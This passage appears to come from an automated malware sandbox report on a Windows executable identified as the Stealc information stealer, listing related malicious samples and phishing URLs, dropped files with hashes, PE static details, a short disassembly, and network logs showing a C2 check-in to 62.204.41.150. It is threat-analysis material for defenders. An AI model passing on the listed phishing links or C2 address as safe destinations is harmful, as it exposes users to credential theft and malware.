	https://email.oxblue.com/e3t/Ctc/Q+113/cdDrv04/VXdfjN46m5dxW4GJlKB4fd0DdW2sbCLr5lTFq6N7Hm8xT3qgyTW7Y8-PT6lZ3lzW1ccS1H8Y8rzXW1hrlTV77h1NhW5_pVzH8bsnn6W1PWxqV8D5TN_W4_z5yx2Cz_4sMrZF-GqDHzcW8pZQ3N3BhYgKW3tmwg72n4TxDW4fS46V1-s7dgW57YVF64HfrMMW2BxxC75X21XdW1nBYw_1PMVGyW8s_YKQ6BTQZmW8wDJ4k3-yNbbW2_BGfy66mfVdW937hqt5kq1CcW4XD3mN54BQSWW4G8TK98NTx7zW74frv25zlZbQW5ztJ6n6fGJFrMSqBjr36qwYW2tk9Xh21wMKrW5RXwDq1M2mmrW3nyq_P20wBvNN8-tVH1nqcD1W5m3Vz04sj9CQf2ygfDq04	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://url.avanan.click/v2/r01/___https://www.tiktok.com/qnspdA7?fni=6cbb&qfsl=js&xhjsj=gnt_zwq&yfwljy=myyux:ddBBB.lttlqj.htr.gtdzwq?v=frudxdxrtxfilfrjx.htrd.iwtlt___.YXAzOnNvdXRoZXJua2l0Y2hlbmFuZGdyaWxsOmE6bzpjOGJiNWZiM2U4NjZhMDk1M2Y0MGVjY2U1MDhmYjQ4YTo3OmM4Y2I6MDdlZDdhNDI4N2UyMzc1NGJjZGQ1YjkyOWYyODg2OTI5ZDkyNzU0YTQ2NWI4MzhkYWZlMmM3NjA5ZGMyZGNmMzpoOlQ6VA#YnJhbmRvbi53YW5nQGludGVncmFjb25uZWN0LmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	https://www.rhris.com/EmailEmploymentValidation.cfm?EmploymentRefID=E84F959AEA960B8186C356E23E6C822C8E204B6A75564EECEC1823507D68DDBF	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://future.nhs.uk	Get hash	malicious	Unknown	Browse	192.229.221.95
bg.microsoft.map.fastly.net	NdSXVNeoET.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	199.232.210.172
	vEcIHT68pU.exe	Get hash	malicious	LummaC	Browse	199.232.214.172
	file.exe	Get hash	malicious	Vidar	Browse	199.232.214.172
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	199.232.214.172
	file.exe	Get hash	malicious	Stealc	Browse	199.232.210.172
	https://email.oxblue.com/e3t/Ctc/Q+113/cdDrv04/VXdfjN46m5dxW4GJlKB4fd0DdW2sbCLr5lTFq6N7Hm8xT3qgyTW7Y8-PT6lZ3lzW1ccS1H8Y8rzXW1hrlTV77h1NhW5_pVzH8bsnn6W1PWxqV8D5TN_W4_z5yx2Cz_4sMrZF-GqDHzcW8pZQ3N3BhYgKW3tmwg72n4TxDW4fS46V1-s7dgW57YVF64HfrMMW2BxxC75X21XdW1nBYw_1PMVGyW8s_YKQ6BTQZmW8wDJ4k3-yNbbW2_BGfy66mfVdW937hqt5kq1CcW4XD3mN54BQSWW4G8TK98NTx7zW74frv25zlZbQW5ztJ6n6fGJFrMSqBjr36qwYW2tk9Xh21wMKrW5RXwDq1M2mmrW3nyq_P20wBvNN8-tVH1nqcD1W5m3Vz04sj9CQf2ygfDq04	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://protect2.fireeye.com/v1/url?k=31323334-50bba2bf-3132a9b3-4544474f5631-9e1721db7158d01a&q=1&e=fd99754d-b74a-4ce2-bf27-63a41e808f94&u=https%3A%2F%2Fwww.rhris.com%2FEmailEmploymentValidation.cfm%3FEmploymentRefID%3DE84F959AEA960B8186C356E23E6C822C8E204B6A75564EECEC1823507D68DDBF	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://future.nhs.uk	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://eu.pbe.encryption.symantec.com/login.html?msgUserId=682e23d9f715c97c&enterprise=lgas&locale=en_US	Get hash	malicious	Unknown	Browse	199.232.210.172
	YSjOEAta07.exe	Get hash	malicious	FormBook	Browse	199.232.210.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TNNET-ASTNNetOyMainnetworkFI	5rVhexjLCx.exe	Get hash	malicious	Stealc	Browse	62.204.41.150
	file.exe	Get hash	malicious	Stealc	Browse	62.204.41.150
	0h5IfpqflF.exe	Get hash	malicious	Stealc	Browse	62.204.41.159
	file.exe	Get hash	malicious	Stealc	Browse	62.204.41.159
	552RZ9fPMe.exe	Get hash	malicious	Stealc	Browse	62.204.41.159
	vmgon5Zqja.exe	Get hash	malicious	Stealc, Vidar	Browse	62.204.41.159
	file.exe	Get hash	malicious	Stealc	Browse	62.204.41.159
	956d73b7f041.exe	Get hash	malicious	Stealc	Browse	62.204.41.159
	InstallSetup.exe	Get hash	malicious	Stealc	Browse	62.204.41.159
	ScreenUpdateSync.exe	Get hash	malicious	Stealc, Vidar	Browse	62.204.41.159

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
1138de370e523e824bbca92d049a3777	file.exe	Get hash	malicious	Credential Flusher	Browse	13.107.246.64
	https://www.rhris.com/EmailEmploymentValidation.cfm?EmploymentRefID=E84F959AEA960B8186C356E23E6C822C8E204B6A75564EECEC1823507D68DDBF	Get hash	malicious	Unknown	Browse	13.107.246.64
	https://future.nhs.uk	Get hash	malicious	Unknown	Browse	13.107.246.64
	file.exe	Get hash	malicious	Credential Flusher	Browse	13.107.246.64
	https://fenster-mark-gmbhsharefile.btn-ebikes.com/	Get hash	malicious	Unknown	Browse	13.107.246.64
	Hscni Remittance_8115919700_16831215.html	Get hash	malicious	Tycoon2FA	Browse	13.107.246.64
	xwZfYpo16i.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Stealc	Browse	13.107.246.64
	High Court Summons Notice.pdf	Get hash	malicious	Unknown	Browse	13.107.246.64
	file.exe	Get hash	malicious	Credential Flusher	Browse	13.107.246.64
	https://pub-a58bcfc58507426ca38ee3be5a258dab.r2.dev/index.html	Get hash	malicious	HTMLPhisher	Browse	13.107.246.64
28a2c9bd18a11de089ef85a160da29e4	file.exe	Get hash	malicious	Credential Flusher	Browse	13.107.246.64
	VLSiVR4Qxs.exe	Get hash	malicious	LummaC, Vidar	Browse	13.107.246.64
	vEcIHT68pU.exe	Get hash	malicious	LummaC	Browse	13.107.246.64
	5rVhexjLCx.exe	Get hash	malicious	Stealc	Browse	13.107.246.64
	https://t.dripemail3.com/c/eyJhbGciOiJIUzI1NiJ9.eyJhdWQiOiJkZXRvdXIiLCJpc3MiOiJtb25vbGl0aCIsInN1YiI6ImRldG91cl9saW5rIiwiaWF0IjoxNzI4MzEwODA2LCJuYmYiOjE3MjgzMTA4MDYsImFjY291bnRfaWQiOiIyNzYyNjA5IiwiZGVsaXZlcnlfaWQiOiJwODJtNGNzMzB4cXl2Zmh0NzQxaSIsInRva2VuIjoicDgybTRjczMweHF5dmZodDc0MWkiLCJzZW5kX2F0IjoxNzI4MzA5NzMyLCJlbWFpbF9pZCI6OTk2NDE4NiwiZW1haWxhYmxlX3R5cGUiOiJCcm9hZGNhc3QiLCJlbWFpbGFibGVfaWQiOjM5NTQwMTYsInVybCI6Imh0dHBzOi8vZGFpbHlhbGFza2EuY29tL25ld3M_X19zPWw5bzljOTZzbG8xZjF3aGFiODZrJnV0bV9zb3VyY2U9ZHJpcCZ1dG1fbWVkaXVtPWVtYWlsJnV0bV9jYW1wYWlnbj0lRjAlOUYlOTElOEMrV2UrTWFkZStJdCtFYXN5K0ZvcitZb3UrJUYwJTlGJTkxJThDIn0.MNRoosOspCCWwx3VuYY41W-crcEzfjjfIELlO_QMAdM	Get hash	malicious	HtmlDropper	Browse	13.107.246.64
	https://forms.office.com/Pages/ShareFormPage.aspx?id=W8eUhlA4rUOuklSyoCn21mtmgAvPzYFJuSM99R6gX3dUQ1IyWUM1UUhTS1pWQ0xXNkI3RzlRRkFIVi4u&sharetoken=93tGEOrxpFy3X0nnxFcr	Get hash	malicious	HTMLPhisher	Browse	13.107.246.64
	Contract_Agreement_Monday October 2024.pdf	Get hash	malicious	Unknown	Browse	13.107.246.64
	file.exe	Get hash	malicious	Vidar	Browse	13.107.246.64
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	13.107.246.64
	file.exe	Get hash	malicious	Stealc	Browse	13.107.246.64

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_1f13Cs1ogc.exe_d6c2601472a1e2329a283caeddd13e21ba0c439_01cc4f56_d1e131fd-d66e-4158-87c7-730795a95caa\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.6526090891527181
Encrypted:	false
SSDEEP:	96:G1FCx8Bjr057v1Zs1wy61aAPf5QXIDcQvc6QcEVcw3cE/Wvm+HbHg/5hZAX/d5Ft:6Tjr01Zg0BU/AjhzuiFkZ24IO8Z
MD5:	A10B84F5D092B8D44F85BF546D255526
SHA1:	AA9FFBEA66E7D517F4C6065AA6363007EB663680
SHA-256:	069B8AEC3A24AC7BCC8AF41201411B9DA4AC39831FEE80DE1ED2AFAA2E7EC901
SHA-512:	94244869C2C5C2E8124EF9112CD3A069BAC5C1D7F3589C17B5BE5507E785F35C19ECC59EAD950088339BB5F9DB1FEEC3A27E72FBB172D07C92061A764D7C7672
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.7.9.3.1.6.5.6.1.4.1.2.9.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.7.9.3.1.6.5.9.8.9.1.1.3.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.1.e.1.3.1.f.d.-.d.6.6.e.-.4.1.5.8.-.8.7.c.7.-.7.3.0.7.9.5.a.9.5.c.a.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.2.3.4.e.6.a.2.-.d.3.9.1.-.4.9.9.2.-.b.d.d.2.-.f.3.1.6.a.4.e.0.b.c.d.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.1.f.1.3.C.s.1.o.g.c...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.p.r.o.q.u.o.t.a...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.d.0.-.0.0.0.1.-.0.0.1.4.-.2.7.6.1.-.5.9.6.6.d.8.1.8.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.7.d.0.3.f.6.a.1.a.a.4.5.0.5.0.f.7.b.e.5.5.f.8.7.6.f.e.a.2.d.c.0.0.0.0.0.9.0.4.!.0.0.0.0.2.0.3.1.7.7.c.e.2.7.5.3.1.4.0.f.c.2.5.5.3.3.6.5.e.2.9.2.0.0.5.d.3.8.3.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD1B3.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon Oct 7 16:46:05 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	34372
Entropy (8bit):	1.7302828387451836
Encrypted:	false
SSDEEP:	192:SNP0sOntGAd0xI3dcmMWbvcJXWNRsgWmX8g:NjtGAKxI3jMWbcX6Rr
MD5:	7C25AA9CFE26B9650B1F5E6656542BD6
SHA1:	DAA038ACFC2E93309EF593FDD1566D2885F16512
SHA-256:	535AE63AED98301152B13B4ED0DA1777AAAF0B5D8448F8A72D51AF8B4FAF1D96
SHA-512:	6DAA33C693486F901460DE4A88DE1006820EEF0AA97C79121D6238D03340B381509B7C52B3BBAE97E6008D63EC46C5561C5DF7B7248047A37ED7E695D4530BAD
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......M..g........................d...........................T.......8...........T...........P....z......................................................................................................eJ..............GenuineIntel............T...........L..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD221.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8330
Entropy (8bit):	3.6967309422530445
Encrypted:	false
SSDEEP:	192:R6l7wVeJ0jW6G6YEInSU2nvgmfeWgIprq89b4Usfhom:R6lXJOW6G6YE4SU2nvgmfeWg+4Hfb
MD5:	1134EF2A7CABF3CB883E3F7774C858E7
SHA1:	6EF63CF401B76E21494F78AF2D77BAAC0B150215
SHA-256:	1FBD41036E1E2FE949F407E96FD6CB6740B1BCD81292811CC42D23FA3BD0BFE6
SHA-512:	16887643157519D1F53DE5E09E58040435F54782FAEBFEB3FEF71CD20B8920EBCED8B22D6EBD6F8DFB1A03F33555DDDF6647E0ADFFBB420A583C5098675858EA
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.3.5.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD261.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4678
Entropy (8bit):	4.469992287553681
Encrypted:	false
SSDEEP:	48:cvIwWl8zsEuJg77aI9qVWpW8VYLYm8M4J02F5xW8+q82BawL2dMd:uIjfEkI7Qk7VDJnxW8RawL2dMd
MD5:	3E3EB9824E0436B88E3E484C9008E9F0
SHA1:	7D0603FF3EB0CA88A964205BBC301C74F0E8C996
SHA-256:	A62FC40CD5902DA614F184B209ACDA2D700477E661443D9FDFF6FC6238C42D45
SHA-512:	0F60F8F18E0E3BCC2CBCF63B363DD1534CEA1CA0CB0AE18B2F6906CA2685FB41042CA1A68D42D33709C51C8EB4B8B717FAD7B86EE0DF6C572FDDE845652E4220
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="533268" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.422062079740462
Encrypted:	false
SSDEEP:	6144:XSvfpi6ceLP/9skLmb0OTiWSPHaJG8nAgeMZMMhA2fX4WABlEnND0uhiTw:CvloTiW+EZMM6DFyB03w
MD5:	BBFF0F22B1CF9C62DC54880EA592C4B6
SHA1:	8211F41CA2C96B4A2530DCF5218F91FB6CAE3294
SHA-256:	083A0912577317C11276657088F5EDEF66CE2915622C3F14425632C4837D227F
SHA-512:	908D473ECF471CE12853353CE4DF28F06F3646F904A5071BC6AC7D2DF4AB14E305A0C7FC03EAE9A3F382FC2D0F4C3A1C084D5904031838B7E56AC985A3E8812C
Malicious:	false
Reputation:	low
Preview:	regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmv..f...................................................................................................................................................................................................................................................................................................................................................R........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.6826865703655915
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	1f13Cs1ogc.exe
File size:	505'344 bytes
MD5:	be961e1299e54c9a50c773db0dc3696c
SHA1:	203177ce2753140fc2553365e292005d383e2936
SHA256:	5501120627d6aa86b043d6ca51b3bb2dffeb44a8c0cf6f153d6fdf550d76690f
SHA512:	bc0bbea65fb54c4a059d3c71c807b2fa5d77ae9bf0902664014d75eb432f4fa752fcb59cd993f54498bc1a28ab044c5d5144b5f250676f9725cce917540e0d43
SSDEEP:	12288:VpJlka1IlaV/mfE6NNlu5wchlzbuTKWGoaz9ec14S:VOa1OVw3NiTDaz9ecO
TLSH:	FBB4F04175C1C432D873293246F0DA755E7DB9B00A66AEDF63840FBE0F30681DB25AAB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=.9.y.WUy.WUy.WU..TTu.WU..RT..WU..STl.WU..VTz.WUy.VU!.WUilTTm.WUilSTk.WUilRT4.WU1m^Tx.WU1m.Ux.WU1mUTx.WURichy.WU...............

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x406f52
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x67040A64 [Mon Oct 7 16:20:52 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	d10af643340e1121562abe3e6bd5b0e1

Entrypoint Preview

Instruction
call 00007F92ECB4CD20h
jmp 00007F92ECB4C28Fh
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push esi
mov ecx, dword ptr [eax+3Ch]
add ecx, eax
movzx eax, word ptr [ecx+14h]
lea edx, dword ptr [ecx+18h]
add edx, eax
movzx eax, word ptr [ecx+06h]
imul esi, eax, 28h
add esi, edx
cmp edx, esi
je 00007F92ECB4C42Bh
mov ecx, dword ptr [ebp+0Ch]
cmp ecx, dword ptr [edx+0Ch]
jc 00007F92ECB4C41Ch
mov eax, dword ptr [edx+08h]
add eax, dword ptr [edx+0Ch]
cmp ecx, eax
jc 00007F92ECB4C41Eh
add edx, 28h
cmp edx, esi
jne 00007F92ECB4C3FCh
xor eax, eax
pop esi
pop ebp
ret
mov eax, edx
jmp 00007F92ECB4C40Bh
push esi
call 00007F92ECB4D034h
test eax, eax
je 00007F92ECB4C432h
mov eax, dword ptr fs:[00000018h]
mov esi, 0047B34Ch
mov edx, dword ptr [eax+04h]
jmp 00007F92ECB4C416h
cmp edx, eax
je 00007F92ECB4C422h
xor eax, eax
mov ecx, edx
lock cmpxchg dword ptr [esi], ecx
test eax, eax
jne 00007F92ECB4C402h
xor al, al
pop esi
ret
mov al, 01h
pop esi
ret
push ebp
mov ebp, esp
cmp dword ptr [ebp+08h], 00000000h
jne 00007F92ECB4C419h
mov byte ptr [0047B350h], 00000001h
call 00007F92ECB4C6CAh
call 00007F92ECB4F5E7h
test al, al
jne 00007F92ECB4C416h
xor al, al
pop ebp
ret
call 00007F92ECB58049h
test al, al
jne 00007F92ECB4C41Ch
push 00000000h
call 00007F92ECB4F5EEh
pop ecx
jmp 00007F92ECB4C3FBh
mov al, 01h
pop ebp
ret
push ebp
mov ebp, esp
cmp byte ptr [0047B351h], 00000000h
je 00007F92ECB4C416h
mov al, 01h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2c6c0	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x7c000	0x3d8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7d000	0x1ad4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x2abc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2ab00	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x23000	0x12c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x210f0	0x21200	957bcb00763b6762ded448431edb3bb1	False	0.5865713443396227	data	6.670169912190407	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x23000	0x9d78	0x9e00	16f1acc49cfaa93114ad2651fe1bc782	False	0.43517602848101267	data	4.959108885925861	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x2d000	0x4ef78	0x4e200	f2d78f38e2bcb0a2c204cdbdca063f1f	False	0.9899375	DOS executable (block device driver \377\377\377\377,32-bit sector-support)	7.99065530703881	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x7c000	0x3d8	0x400	5584c2fd2a321b3ff4d89d84727643be	False	0.4404296875	data	3.290569201128903	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x7d000	0x1ad4	0x1c00	16092792d232aa39e24b762c0f4a37ab	False	0.7273995535714286	data	6.393192590005456	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x7c058	0x380	data	English	United States	0.46205357142857145

Imports

DLL

Import

KERNEL32.dll

AttachConsole, MultiByteToWideChar, GetStringTypeW, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, CreateFileW, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, HeapAlloc, HeapFree, GetFileType, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileSizeEx, SetFilePointerEx, CloseHandle, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetProcessHeap, ReadConsoleW, HeapSize, WriteConsoleW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-07T18:46:07.015168+0200	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	49704	62.204.41.150	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2024 18:46:02.671298981 CEST	49674	443	192.168.2.5	23.1.237.91
Oct 7, 2024 18:46:02.671964884 CEST	49675	443	192.168.2.5	23.1.237.91
Oct 7, 2024 18:46:02.765072107 CEST	49673	443	192.168.2.5	23.1.237.91
Oct 7, 2024 18:46:05.663204908 CEST	49704	80	192.168.2.5	62.204.41.150
Oct 7, 2024 18:46:05.668157101 CEST	80	49704	62.204.41.150	192.168.2.5
Oct 7, 2024 18:46:05.668245077 CEST	49704	80	192.168.2.5	62.204.41.150
Oct 7, 2024 18:46:05.668461084 CEST	49704	80	192.168.2.5	62.204.41.150
Oct 7, 2024 18:46:05.673353910 CEST	80	49704	62.204.41.150	192.168.2.5
Oct 7, 2024 18:46:06.424277067 CEST	80	49704	62.204.41.150	192.168.2.5
Oct 7, 2024 18:46:06.424357891 CEST	49704	80	192.168.2.5	62.204.41.150
Oct 7, 2024 18:46:06.468998909 CEST	49704	80	192.168.2.5	62.204.41.150
Oct 7, 2024 18:46:06.473977089 CEST	80	49704	62.204.41.150	192.168.2.5
Oct 7, 2024 18:46:07.014967918 CEST	80	49704	62.204.41.150	192.168.2.5
Oct 7, 2024 18:46:07.015167952 CEST	49704	80	192.168.2.5	62.204.41.150
Oct 7, 2024 18:46:08.990940094 CEST	49704	80	192.168.2.5	62.204.41.150
Oct 7, 2024 18:46:12.280661106 CEST	49674	443	192.168.2.5	23.1.237.91
Oct 7, 2024 18:46:12.280663967 CEST	49675	443	192.168.2.5	23.1.237.91
Oct 7, 2024 18:46:12.374380112 CEST	49673	443	192.168.2.5	23.1.237.91
Oct 7, 2024 18:46:14.199723959 CEST	443	49703	23.1.237.91	192.168.2.5
Oct 7, 2024 18:46:14.199829102 CEST	49703	443	192.168.2.5	23.1.237.91
Oct 7, 2024 18:46:19.231635094 CEST	49712	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:19.231669903 CEST	443	49712	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:19.231779099 CEST	49712	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:19.232115984 CEST	49712	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:19.232130051 CEST	443	49712	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:19.671066999 CEST	443	49712	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:19.672220945 CEST	49713	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:19.672260046 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:19.672342062 CEST	49713	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:19.672821999 CEST	49713	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:19.672837019 CEST	443	49713	13.107.246.64	192.168.2.5
